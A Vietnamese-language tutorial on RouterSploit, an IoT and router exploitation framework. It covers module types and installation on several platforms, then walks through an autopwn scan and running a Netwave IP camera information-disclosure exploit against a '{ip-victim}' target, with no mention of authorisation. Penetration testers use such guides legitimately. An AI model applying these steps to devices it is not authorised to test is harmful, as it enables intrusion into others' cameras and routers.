Routersploit: khai thác lỗ hổng bảo mật của Router và thiết bị mạng

RouterSploit là một framework khai thác mã nguồn mở dành riêng cho các thiết bị nhúng – IoT. Công cụ này được phát triển bằng ngôn ngữ python, và do được viết bằng python, nên bạn chỉ cần 1 hệ điều hành cài đặt được python như windows, linux, macOS là có thể chạy được RouterSploit. RouterSploit khai thác thiết bị IoT dựa trên các lỗ hổng đã biết của các nhà sản xuất thiết bị như router mạng, camera, đồ dùng thông minh như bóng đèn, hệ thống cảnh báo trộm,….

RouterSploit bao gồm các module khác nhau hỗ trợ cho các hoạt động kiểm tra thâm nhập:

• exploits – modules tận dụng các lỗ hổng đã xác định
• creds – modules được thiết kế để kiểm tra thông tin xác thực đối với các dịch vụ mạng
• scanners – modules kiểm tra xem mục tiêu có dễ bị khai thác hay không
• payloads – modules chịu trách nhiệm tạo ra payload cho các kiến ​​trúc và điểm injection khác nhau
• generic – modules thực hiện các cuộc tấn công chung  

Cách cài đặt RouterSploit

Yêu cầu cần thiết

Để chạy công cụ RouterSploit, bạn cần cài đặt:

• future
• requests
• paramiko
• pysnmp
• pycrypto
• bluepy – bluetooth low energy (không bắt buộc)

Cài đặt trên Kali Linux

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên Ubuntu 20.04

sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên Ubuntu 18.04 & 17.10

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên OSX

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Cài đặt trên Docker

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Cập nhật

Bạn nên cập nhật RouterSploit thường xuyên vì dự án này đang được phát triển mạnh và các modules mới được phát hành hầu như mỗi ngày.

cd routersploit
git pull

Cách sử dụng RouterSploit

Sau khi cài đặt xong, các bạn truy cập vào thư mục routersploit vừa clone về, và chạy lệnh sau:

cd routersploit

python3 rsf.py

Tiếp theo, các bạn cần biết được IP của đối tượng mình muốn kiểm tra. Sau khi lấy được IP rồi, các bạn gõ lệnh sau để kiểm tra đối tượng trong mạng LAN hoặc môi trường internet:

rsf > use scanners/autopwn

rsf (AutoPwn) > set target 192.168.1.254

run

Routersploit sẽ bắt đầu kiểm tra đối tượng và tìm lỗ hổng, những lỗ hổng nào được tìm thấy sẽ có hình dấu cộng màu xanh ở bên trái. Trường hợp bên dưới, do không tìm thấy lỗ hổng nào nên các bạn sẽ không thấy dấu cộng màu xanh.

Còn nếu các bạn gặp trường hợp thấy dấu cộng màu xanh giống như hình dưới đây thì routersploit đã tìm ra lỗ hổng rồi đó.

Đây là lỗ hổng liên quan đến camera và được tìm thấy ở port 82. Tiếp theo, các bạn chạy lệnh sau để bắt đầu khai thác lỗ hổng đó.

use exploits/cameras/multi/netwave_ip_camera_information_disclosure

set target {ip-victim}

show option

set port 82

Sau khi set lỗ hổng, IP, và port, các bạn gõ tiếp lệnh run để bắt đầu quá trình khai thác.

Vậy là các bạn đã khai thác lỗ hổng thành công rồi đó. Routersploit là bộ công cụ rất tiện lợi, nhanh và nhẹ, phù hợp cho các trường hợp bạn muốn quét nhanh các thiết bị nghi ngờ có lỗ hổng bảo mật.